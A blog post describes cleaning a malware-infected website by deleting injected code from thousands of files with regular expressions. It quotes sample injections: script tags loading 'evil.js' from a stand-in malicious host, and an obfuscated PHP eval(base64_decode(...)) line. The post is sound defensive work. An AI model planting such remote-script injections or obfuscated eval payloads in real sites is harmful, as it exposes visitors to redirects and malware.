Cleaning Website Malware with Regular Expressions - jrowberg.io
Home Personal Cleaning Website Malware with Regular Expressions

Cleaning Website Malware with Regular Expressions

0 comment

I recently had the enjoyable task of cleaning up a website that had been infected with malware. A friend’s site had suddenly started generating that oh-so-friendly browser warning—you know, the one with the bright red background and the big message that says “Warning: Visiting this site may harm your computer!” Not only does this problem basically kill your search engine rankings, but it also undermines any confidence in your company or product. So, obviously, she wanted it cleaned as soon as possible.

Originally, since the main portion of the site is hosted through Ning social network, I thought that a rogue user (or smart bot) had created a profile with links to malware sites, and that profile had been around long enough that Google picked up on it and labeled the site as evil. However, I should have known that Google is smarter than that. Merely having clickable links to evil sites won’t cause them to flag a site as hosting malware. Good thing, too, since that would implicate many perfectly clean blogs and forums whose comments aren’t completely moderated.

Actually, browsing to nearly any page on the entire site caused not only the malware warning, but if you ignored that and proceeded anyway, you would also be redirected to one of many nefarious sites and be bombarded with popups (or popup attempts, if you have a good browser). There is a non-Ning portion of this particular website as well, and that exhibited the exact same symptoms. So, I downloaded the entire website over FTP into my IDE and began looking through some of the files. It was immediately apparent that there was a rampant web-based infection in nearly every file that a normal visitor might touch with their browser. Something evil had access to the hosting account.

Step one, after downloading the whole site, was to change the control panel and FTP passwords. Obvious enough, and fortunately easy. But what about cleaning the 4,000+ PHP, Javascript, and HTML files without destroying anything valuable?

Well, if you happen to have an exact original copy of the entire site, and you can clean it out and re-upload it, then I congratulate you. That’s definitely the easiest solution. But what if you don’t? What if you only have the infected version, and there is no clean master copy?

Use regular expressions, of course! (I love that comic.)

Web malware is most effective (at being evil) if the original website content remains more or less intact. That gives it at least a thin layer of legitimacy by which to fool many visitors and somewhat limited search engines. This, in turn, means that if the malware has infected HTML files, the original HTML should still be there along with rogue tags. The same is true for Javascript and PHP files. Each type of file has a unique kind of evil code. Obviously, throwing plain HTML into a .js file won’t do a lot of good (or bad, depending on your viewpoint).

For this particular infection involving PHP, HTML, and JS files, each evil tag looked something like this:

  • HTML:
    <script src=http://somebadsite.com/evil.js></script>
  • Javascript:
    document.write('<script src=http://somebadsite.com/evil.js></script>');
  • PHP:
    <?php eval(base64_decode("PHNjcmlwdCBzcmViYWRzaXRlLmNvbT48L3NjcmlwdD4=")); ?>

There is a particular pattern to these, which helps us clean them out automatically. Notice the obfuscation in the PHP code, for one thing. They use base64_decode() to hide the true code. But how often does anyone legitimately use eval() and base64_decode() in their PHP code? Not often, I’d guess. Also, notice the lack of quotes around the script’s src attribute value. That’s bad form, and hopefully your code doesn’t look like that.

Here are the regular expressions that I used to wipe out the entire infection. You need an IDE, editor, or shell script that will apply these to an entire source tree recursively. I use PhpED, but I know others will do the trick. Also, it is a very good idea to try find alone before you try replace, in case you have legitimate code that these regexes match. Don’t just assume these will work without testing. They worked beautifully for me though. If your site uses languages other than PHP, JS, and HTML, you may need to modify or add to these. Also, to clean the infection, anything that matches should be replaced with a nothing (i.e. deleted).

  1. /<\?php\s*eval\s*\(\s*base64_decode\s*\(.*?\)\s*\)\s*;\s*\?>/mi
  2. /document\s*\.\s*write\s*\(\s*'<script\s*src=http.*?<\\\/script>\s*'\s*\);\s*/mi
  3. /<script\s+src=http.*?<\/script>/mi

Pay special attention to the last one in this list, since it will kill any <script> tags that don’t have quotes around the src attribute, have the src attribute immediately following the tag name, and have an absolute source reference. If you write your JS code this way, then be very careful with that one. Again, try running a global find with these expressions before you run a global replace, or you very well may be sorry.

Anyway, after my IDE cleaned over 4,000 infected files with those three regexes, I re-uploaded the entire site and submitted it for review using Google’s webmaster tools. That was only last week, so the warning hasn’t been removed yet, but the site functions perfectly and there are no more attempted redirects or popups.

You may also like

Leave a Comment